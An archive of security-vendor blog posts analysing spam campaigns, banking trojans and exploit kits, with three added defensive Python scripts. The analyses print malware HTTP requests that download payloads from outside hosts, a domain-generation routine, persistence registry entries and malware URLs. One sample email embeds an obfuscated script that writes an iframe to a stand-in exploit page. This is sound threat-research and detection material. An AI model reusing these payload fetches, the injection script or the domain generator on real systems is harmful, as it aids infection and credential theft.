Archive for the ‘Spam’ Category


The Cridex Trojan Targets 137 Financial Organizations in One Go

By Daniel Chechik  •  March 1st, 2012  •   Botnets Cybercrime Malware Spam

A few weeks ago M86 Security Labs alerted that cybercriminals had managed to compromise hundreds of WordPress-based sites. These attacks started with several large spam campaigns, as reported in our most recent blog post on Cutwail. The emails carried embedded URL links or HTML attachments that tricked the user into browsing to the compromised Web sites, and all of these links eventually led to Web pages infected with the Phoenix exploit kit. The cybercriminals operate fast-flux networks, a DNS technique used by botnets to hide the main C&C servers.

After the target machine is successfully exploited, the Phoenix exploit kit downloads a Trojan to the victim’s machine. Antivirus vendors recognize the downloaded Trojan under several names, such as Cridex, Carberp and Dapato. Antivirus detection is quite low: only ten of the 43 antivirus scanners in VirusTotal detect it.

VirusTotal scan of Cridex


Let’s take a look at how this Trojan operates, step by step.

Once the Cridex Trojan is loaded onto the victim’s machine, it performs several actions. First, it copies itself to drive C: as KB00447841.exe and creates the following files:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT
C:\Documents and Settings\Administrator\Application Data\KB00447841.exe

Upon execution, the BAT file removes the original malware downloaded by the Phoenix exploit kit.

In the second phase, the malware hooks into the “explorer.exe” process. It then communicates with its C&C over fast-flux networks, which makes the C&C servers harder to identify and shut down. Every several hours one domain becomes unavailable and is replaced by another. In some cases, the Trojan’s traffic flow can look like this:

Fiddler dump of the Trojan’s traffic activity


Cridex consistently tries to find a live proxy through which to reach the C&C server. At first glance the domain names look random. On closer inspection, however, we see that the Trojan generates a new domain name before every attempt to access the C&C:

Ollydbg - Debugging of "Explorer.exe" infected by the Trojan

Here is pseudo code of the Trojan’s domain generation routine:

ECX = ECX * 0x19660D
ECX = ECX + 0x3C6EF35F
ECX = ECX << 0x10
ECX = ECX - 0x7FFF
EAX = ECX
EDX = 0
EAX = EAX XOR 0x88
EBP = 0x1A                      ; divisor: 26 letters in the alphabet
EAX = EAX / 0x1A
EDX = EAX % 0x1A                ; remainder of the division, 0..25
ESI++
EDX = EDX + 0x61                ; 0x61 = 'a', so EDX now holds a lowercase letter
Address[EBX + ESI] = DX         ; append the letter to the domain name buffer
Loop until the domain name reaches its full length

Using this algorithm to generate and access domains, the cybercriminals can resume the attack even after their server(s) have been offline for some period of time.
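To illustrate how a defender can act on this behaviour, here is an added example (not code from the original post or from M86) that scans DNS resolver log lines for a host querying a burst of domains shaped like this generator's output: labels built only from the letters a to z with few vowels, most of which fail to resolve while the bot hunts for a live proxy. The log format, the sample lines, the lexical thresholds and the per-client threshold are all assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Constructed DNS resolver log lines for this example (not a real capture).
# Format assumed here: <time> <client-ip> <query-name> <rcode>
SAMPLE_DNS_LOG = """\
10:00:01 10.1.1.20 www.google.com NOERROR
10:00:02 10.1.1.20 gogle.com NXDOMAIN
10:00:05 10.1.1.20 mail.example.com NOERROR
10:00:07 10.1.1.57 qzvkmtpyrbw.ru NXDOMAIN
10:00:08 10.1.1.57 hrtklmsdqe.ru NXDOMAIN
10:00:09 10.1.1.57 bnvxkrtwe.ru NXDOMAIN
10:00:10 10.1.1.57 pldjqkmrt.ru NXDOMAIN
10:00:11 10.1.1.57 gtsrkvbnhu.ru NXDOMAIN
10:00:12 10.1.1.57 wqpzmtkrls.ru NOERROR
10:00:13 10.1.1.57 www.microsoft.com NOERROR
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
VOWELS = set("aeiou")


def second_level_label(qname):
    """Return the label left of the TLD, e.g. 'qzvkmtpyrbw' for 'qzvkmtpyrbw.ru'."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(label):
    """Coarse lexical filter for labels shaped like the generator's output:
    letters a-z only, 7 to 20 characters, and either few vowels or a long consonant run.
    The thresholds are assumptions for this example, not tuned production values."""
    if not re.fullmatch(r"[a-z]{7,20}", label):
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", label)), default=0)
    return vowel_ratio <= 0.3 or longest_run >= 4


def parse_log(text):
    """Parse the assumed log format into records; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append({"time": m[1], "client": m[2], "qname": m[3].lower(), "rcode": m[4]})
    return records


def flag_dga_clients(records, min_generated=5):
    """Group generated-looking query names per client. A client over the threshold is
    reported together with the subset that resolved, which is the likely live proxy
    and the first candidate for blocking or sinkholing."""
    per_client = defaultdict(dict)
    for r in records:
        if looks_generated(second_level_label(r["qname"])):
            per_client[r["client"]][r["qname"]] = r["rcode"]
    flagged = {}
    for client, domains in per_client.items():
        if len(domains) >= min_generated:
            flagged[client] = {
                "domains": sorted(domains),
                "resolved": sorted(d for d, rc in domains.items() if rc == "NOERROR"),
            }
    return flagged


if __name__ == "__main__":
    for client, info in flag_dga_clients(parse_log(SAMPLE_DNS_LOG)).items():
        print(client, "queried", len(info["domains"]),
              "generated-looking domains; resolved:", info["resolved"])
```

The lexical filter alone will misjudge some real names, so the decision is made on the burst of distinct generated-looking queries from one client rather than on any single domain; the resolved subset is what to feed into a blocklist or sinkhole.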

Once the Trojan finds a live proxy, it connects to the C&C server and downloads a customized configuration from the Cridex botnet. The cybercriminals are currently running multiple botnets with over 25,000 infected machines.

Cridex botnet control panel


This Trojan’s capabilities are broadly similar to those of Zeus and SpyEye. It collects information from the user’s machine and sends it to the C&C server; this information can include, for example, cookies, FTP credentials and email accounts.

The configuration panel of the Cridex Trojan


The cybercriminals can track specific Web sites accessed by the user by taking screenshots of every page the user visits, in real time. They can also blacklist URLs, redirect URLs and more. As with the Zeus Trojan, the administrators can supply code to be injected into Web pages: the Cridex Trojan intercepts browser requests and changes the displayed content according to the configuration written by the administrator of the botnet. This way the cybercriminal can trick the user into entering the valuable information the cybercriminal is looking for, without raising suspicion.

What’s new in the Cridex Trojan compared to Zeus or SpyEye?

Cridex has a “WORLD BANKER CENTER” plug-in which includes a database of 137 banks. Yes, one hundred and thirty-seven different banks or financial organizations from all over the world!

Data collected by the "WORLD BANK CENTER" plug-in


This control panel provides a simple user experience for the cybercriminals. It contains the structure of each banking organization’s Web site pages, so the Trojan can identify which valuable fields to send back to the C&C. Moreover, the cybercriminals can create and change the forms that the victim would normally complete.

Templates of "WORLD BANK CENTER" plug-in


In conclusion, the Cridex Trojan takes control of the victim’s machine, allowing the cybercriminals to collect information and potentially make fraudulent transactions by manipulating the bank Web pages.

M86 MailMarshal Secure Email Gateway customers are protected against these blended threat spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix exploit kit and in particular against the Cridex Trojan.



Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez  •  February 16th, 2012  •   Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened the message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, its default settings fortunately prevented the malicious JavaScript in the HTML source code from running. A Thunderbird user would need to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example, from a more recent spam campaign. This particular message claims to be an invoice from a random company, with an attached .HTM file posing as the invoice file. Here the sample spam was opened in Microsoft Outlook, where the attachment simply shows the icon of the system’s default browser. Again, for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.


So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second, malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a web page in the same browser window. This is no ordinary web page: it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugins. On our test machine, the landing page successfully exploited the browser’s default PDF reader through the LibTIFF integer overflow vulnerability in Adobe Reader. The exploit ended up downloading and installing malware on our test computer, which at the time of writing was a data-stealing Trojan with the antivirus detection name Cridex.
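As an added example (not the original post’s code), the following Python shows the check a mail gateway can apply to such attachments: parse the message, pull out every .htm/.html attachment and flag any that contains a script block with the constructs the post describes (unescape, document.write, an iframe). The two sample messages, the example.invalid addresses and the pattern list are constructed for this example.

```python
import email
import re
from email import policy

# Constructed sample message modelled on the campaign described above (not a real capture):
# a "Please wait... Loading...." page whose script block writes an escaped iframe.
SAMPLE_EMAIL = b"""From: billing@example.invalid
To: user@example.invalid
Subject: Invoice #4711
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: text/html; name="Invoice.htm"
Content-Disposition: attachment; filename="Invoice.htm"

<html><head><title>You are redirecting...</title></head><body>Please wait... Loading....
<script>var x=unescape("%3Ciframe%20src%3D%22http%3A//landing.example.invalid/%22%3E%3C/iframe%3E");document.write(x);</script>
</body></html>
--b1--
"""

# Constructed benign message: an HTML attachment with no script block at all.
BENIGN_EMAIL = b"""From: newsletter@example.invalid
To: user@example.invalid
Subject: Monthly update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

The HTML version of this month's update is attached.
--b2
Content-Type: text/html; name="update.htm"
Content-Disposition: attachment; filename="update.htm"

<html><body><h1>Monthly update</h1><p>No scripts here.</p></body></html>
--b2--
"""

# Constructs common in obfuscated redirector scripts; a heuristic list chosen for this
# example, not a vendor signature set.
SUSPICIOUS_JS = [
    r"document\.write\s*\(",
    r"<iframe",
    r"unescape\s*\(",
    r"String\.fromCharCode",
    r"\beval\s*\(",
]


def scan_html(html):
    """Report whether an HTML document carries a script block and which patterns it hits.
    An iframe built through unescape() never appears as a literal '<iframe', so the
    presence of any <script> in an 'invoice' is the primary signal."""
    has_script = "<script" in html.lower()
    hits = [p for p in SUSPICIOUS_JS if re.search(p, html, re.IGNORECASE)]
    return {"has_script": has_script, "patterns": hits, "suspicious": has_script and bool(hits)}


def scan_message(raw):
    """Parse a raw RFC 5322 message and scan every .htm/.html attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):          # e.g. sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        result = scan_html(body)
        result["filename"] = name
        results.append(result)
    return results


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_EMAIL), ("benign", BENIGN_EMAIL)):
        print(label, scan_message(raw))
```

Quarantining on the presence of any script block in an attached “invoice” is the robust rule; the pattern hits only explain the verdict, and, as the sample shows, an iframe written via unescape() does not match a literal <iframe> search.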

The landing page that contains the exploit code belongs to a kit the cybercriminals are using for this particular spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use; all they need is their own web server that can run PHP scripts. The image shown below is a screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4,000 visitors, 15% of whom were successfully exploited.


Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.



M86 Security Threat Report for the Second Half of 2011 is Now Available

By Ziv Mador  •  February 8th, 2012  •   Botnets Cybercrime Reports Social Networking Spam Vulnerabilities

We are releasing today our bi-annual Threat Report for 2H 2011. The report relies on M86 Security Labs analysis of spam and malware activity, including the current use of exploit kits, fraudulent digital certificates and social networking schemes. Key points from the M86 Security Labs for the second half of 2011 are:
1. Targeted attacks became sophisticated and pursued a wider range of organizations, including commercial, national critical infrastructure and military targets.
2. Use of stolen or fraudulent digital certificates has become more common, especially as part of targeted attacks.
3. In several targeted attacks, malware was hidden by embedding itself in various file formats—with a few cases of multiple embedding layers. This method can evade security software that fails to scan deep enough.
4. Blackhole has become the most prevalent exploit kit in the second half of 2011 with a huge margin over other exploit kits. Some of the exploit kits which were active in the past are rarely used now or were practically abandoned.
5. Newer versions of Blackhole are being deployed first in Eastern Europe. Its authors increased its update frequency and added new exploits and tricks to evade detection, such as checking the software version on the client machine before attempting to exploit it.
6. Fake social media notifications are now a mainstream way for spammers to dupe users into clicking links.
7. Facebook continues to be a conduit for spam and malware, as many campaigns are spreading virally by enticing users to share posts that promise gift cards or other rewards.
8. Hacked, but otherwise legitimate, websites played a major role in distributing spam and malware by redirecting browsers to the ultimate destination.
9. Malicious Web content currently exploits more than 50 vulnerabilities in various software products. The most commonly exploited products are Microsoft Internet Explorer, Oracle Java, Adobe Acrobat Reader, Adobe Flash and Microsoft Office products.
10. The overall volume of spam continued to decline in 2011, reaching a four-year low in December 2011.
11. Eight spamming botnets were responsible for 90% of the spam monitored by M86 Security Labs. All of these botnets are familiar and have been established for some time.
12. The proportion of malicious spam rose in the second half of the year from less than 1% to 5%, including a massive spike in malicious attachments in August and September. Later in the year, the focus shifted from malicious attachments to malicious links that led to exploit kits, in particular, the Blackhole exploit kit.
13. Some noticeable wins by law enforcement authorities and researchers against cybercriminals, botnets and affiliate programs like fake AV and rogue online pharmacies, took place this year.
14. Malicious Web content hosted in China targets mostly older versions of Internet Explorer, which is popular in that country.
15. Almost half of the global malicious Web content is hosted in the U.S. The states hosting most malware are Florida, California, Texas and Washington.

The report provides statistics about the geographical distribution of web-based malware, about the most commonly used exploits and about the prevalence of exploit kits. Statistics about spam categories and spam botnets are also provided. In addition to these statistics, the report includes eleven featured articles about current cyber threats and ends with recommendations for administrators, Website owners and end users.

The M86 Security Labs Report can be downloaded from http://m86.it/2HSecReport.

We hope you find the information in this report useful.

M86 Security Labs


Zbot Trojan spreads through fake ConEdison billing notification email

By Rodel Mendrez  •  January 13th, 2012  •   Spam

Today we came across a new malicious spam campaign that is actively sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line “ConEdison Billing Summary as of <DATE>” and the attachment uses the filename format  Billing-Summary-ConEdison-<random numbers>-<Date>.zip.

The attached zip file contains an executable file, which unsurprisingly is a Zbot malware variant. When extracted, the malicious executable uses no disguise: no fake Adobe Reader or Microsoft Word icon, no double file extension, no run of spaces in the file name to hide the .EXE extension. The attached file is so dull that average users should easily spot that it is suspicious.

The good news is that when this particular Zbot sample was run, it failed to communicate with its command and control (CnC) server at plantlunch[dot]ru, which turns out to be currently offline.


In conclusion, bill notifications do not usually arrive with an executable file so emails like this should be treated with extreme suspicion. When you see these obvious signs of malware, just stop and delete the email. M86 MailMarshal customers were protected against this campaign from the moment it began.



Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit

By Rodel Mendrez  •  December 1st, 2011  •   Spam

Over the past few days the Cutwail botnet has been sending out malicious spam campaigns with a variety of themes, such as airline ticket orders, Automated Clearing House (ACH), Facebook notifications and scanned documents. These campaigns carry no malware attachments; instead the payload is delivered via links to malicious code hosted on the web.

The subject lines used in the Facebook spam campaign are similar to those in the image below. Notice that they use varying letter case and random Facebook profile names.


The message body may look like a legitimate Facebook notification. However, further inspection reveals the underlying link redirecting to a malicious webpage.


Another campaign spammed out by Cutwail claims to be a flight ticket order. The spam is easily spotted by its subject lines: it is made to look like a “forwarded” or “reply” email and uses the subject format shown in the image below.


Here is an example of the message:

There are two things to notice about this particular spam campaign. Firstly, the visible URL has no top-level domain and so does not conform to the URI naming scheme, a clumsy mistake by the spammers. Other similar messages use “www.airlines.com”, which is a parked domain. Secondly, “Airlines America” in the signature block is not a real airline company, unless the spammers meant to imply American Airlines.

Two other spam campaigns resurfaced this week, namely the “Automated Clearing House (ACH)” and the “scanned document”.

The URL link in these campaigns points to a compromised web server that serves a small HTML file. That HTML file contains a malicious iframe which opens a Blackhole exploit kit landing page. This is the same exploit kit used in previous spam campaigns such as “Steve Jobs is Alive” and the fake LinkedIn notifications.

If you are a system administrator, you may want to block the following exploit kit landing pages.

  • crredret[dot]ru/main.php
  • www[dot]btredret[dot]ru/main.php
  • bqredret[dot]ru/main.php

At the time of analysis, loading the exploit kit web page downloaded SpyEye and the Bobax spambot onto our vulnerable hosts.


“Steve Jobs Alive!” Spam Campaign Leads To Exploit Page

By Rodel Mendrez  •  October 7th, 2011  •   Spam Vulnerabilities

It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, the cyber-criminals see this as an opportunity. Today, we started seeing a Steve Jobs spam campaign, with the subject suggesting that he is still alive.

Steve Jobs Alive!

Steve Jobs Not Dead!

Steve Jobs: Not Dead Yet!

Is Steve Jobs Really Dead?

Sample of the Steve Jobs spam campaign

The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.

The HTML source code of the Blackhole Exploit kit landing page

The intermediary redirect URLs are random-looking domains under the .ms top-level domain (Montserrat, in case you didn’t know). Here are some examples:

  • hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
  • hxxp://derhvbq[dot]ce[dot]ms/index.php

The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.

Unfortunately, many people may find this spam campaign “click-worthy” given the icon that Steve Jobs was. The usual advice applies – avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States, overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained a malicious attachment with the filename “document.zip”. As suspected, the attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than one piece of additional malware. First was the password-stealing malware Zbot, obtained from the domain name rattsillis[dot]com with a standard HTTP request that downloaded the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after download and drops the following files on the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a randomly generated domain in order to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, the executable file “22.exe”, from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 of 45 antivirus programs under various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10 KB.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder, using the filename format KB{6 random digits}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

The malware then adds an autorun registry key to ensure that it survives a Windows restart.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"
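As an added example (not code from the original post), here is a small triage script for this persistence mechanism: it parses the output of `reg query` for the HKCU Run key and flags values that execute from user-writable locations such as Application Data or the TEMP folder, or whose name imitates a Windows hotfix in the KB{6 digits}.exe style. The sample output, the marker list and the naming pattern are constructed assumptions for this example.

```python
import re

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output, modelled on the value described in the post (not a real capture).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    KB117188.exe    REG_SZ    "C:\Documents and Settings\user\Application Data\KB117188.exe"
    Updater    REG_EXPAND_SZ    %TEMP%\svchost.exe
"""

# Locations a standard user can write to; legitimate autorun entries rarely live here.
USER_WRITABLE = ["\\application data\\", "\\local settings\\temp\\", "\\temp\\", "%appdata%", "%temp%"]
# Name shaped like a Windows hotfix, as used by the spambot (KB + six digits).
HOTFIX_STYLE_NAME = re.compile(r"^KB\d{6}\.exe$", re.IGNORECASE)
# `reg query` prints value lines indented, with at least two spaces between the columns.
ENTRY_RE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_\w+)\s{2,}(.+?)\s*$")


def parse_run_entries(text):
    """Turn `reg query` value lines into dicts; the key-name line has no indent and is skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"name": m[1], "type": m[2], "data": m[3]})
    return entries


def flag_run_entries(entries):
    """Return the entries worth a closer look, each with the reasons it was flagged."""
    flagged = []
    for e in entries:
        reasons = []
        path = e["data"].strip('"').lower()
        if any(marker in path for marker in USER_WRITABLE):
            reasons.append("runs from a user-writable location")
        if HOTFIX_STYLE_NAME.match(e["name"]):
            reasons.append("KB{6 digits}.exe name mimics a Windows hotfix")
        if reasons:
            flagged.append({"name": e["name"], "data": e["data"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for f in flag_run_entries(parse_run_entries(SAMPLE_REG_QUERY)):
        print(f["name"], "->", f["data"], "|", "; ".join(f["reasons"]))
```

The same two checks apply to the HKLM Run key and to the Startup folder; a value that launches from a profile directory is the finding, and the hotfix-style name is just the confirming detail for this particular family.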

After installation, the parent spambot process executes the svchost.exe it dropped in the Windows TEMP folder and then exits.

Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. If that fails, the bot attempts to connect to a randomly generated domain name instead.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot begins using port 1001, over which it sends packets of data to, and receives them from, the control server.

Exchange of data between the control server and the spambot


Meanwhile, on port 1002, the spambot receives the actual spam data from the control server and relays it to the final recipients. This simple proxy can relay spam at a rate of up to 1,000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is located in Germany:

WHOIS information about the control server


This spambot’s recent spamming activity includes both pharmaceutical spam and further ACH campaigns that appear to come from NACHA.org, very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events: a spammed-out Trojan downloader that triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.



Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.


Last week malicious spam made up at least 13% of the total spam volume we received, which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, use mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign


Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox


The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that also installs Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.



Malicious hotel transaction spam

By Gavin Neale  •  July 29th, 2011  •   Spam

Over the past couple of days we have been seeing numerous spam emails which claim that a wrong transaction was made on your credit card from a hotel.

The subject lines look similar to the following two subjects, with varying hotels:

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that, in order to get your money back, you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament


Attached is a Zip file named RefundFormXXX.zip, where XXX is a random three-digit number. Inside this Zip file is an executable file, Refund-Form.exe, which has an icon likely intended to deceive unsuspecting victims into thinking that it is in fact some type of form they can view.

The executable inside the 'RefundForm' Zip file


Once executed, this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). It did not run straight away, so we ran it on a separate test machine and verified that it is a fake AV product named ‘Security Protection’.

A further HTTP request, shown below, is sent to 188.72.202.121 requesting a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer


The file that is retrieved, called ‘update.dat’, is in fact an encrypted Windows DLL. Once decrypted, we discovered that it is a password stealer which targets a huge number of applications, including instant messaging programs, poker clients, FTP clients and web browsers, looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.


Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent, which downloaded the file 1036.exe.

HTTP download of 1036.exe


Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable and the files downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.


Thanks to Rodel Mendrez for his investigation into the password stealer component.


Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a zip file disguised as a credit card statement. Extracting the Zip file reveals a Trojan downloader executable that uses an Adobe PDF icon. When the executable is run, it downloads a fake anti-virus executable from the following URL:

http://mysteryforyou1[dot]ru/pusk.exe


The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.
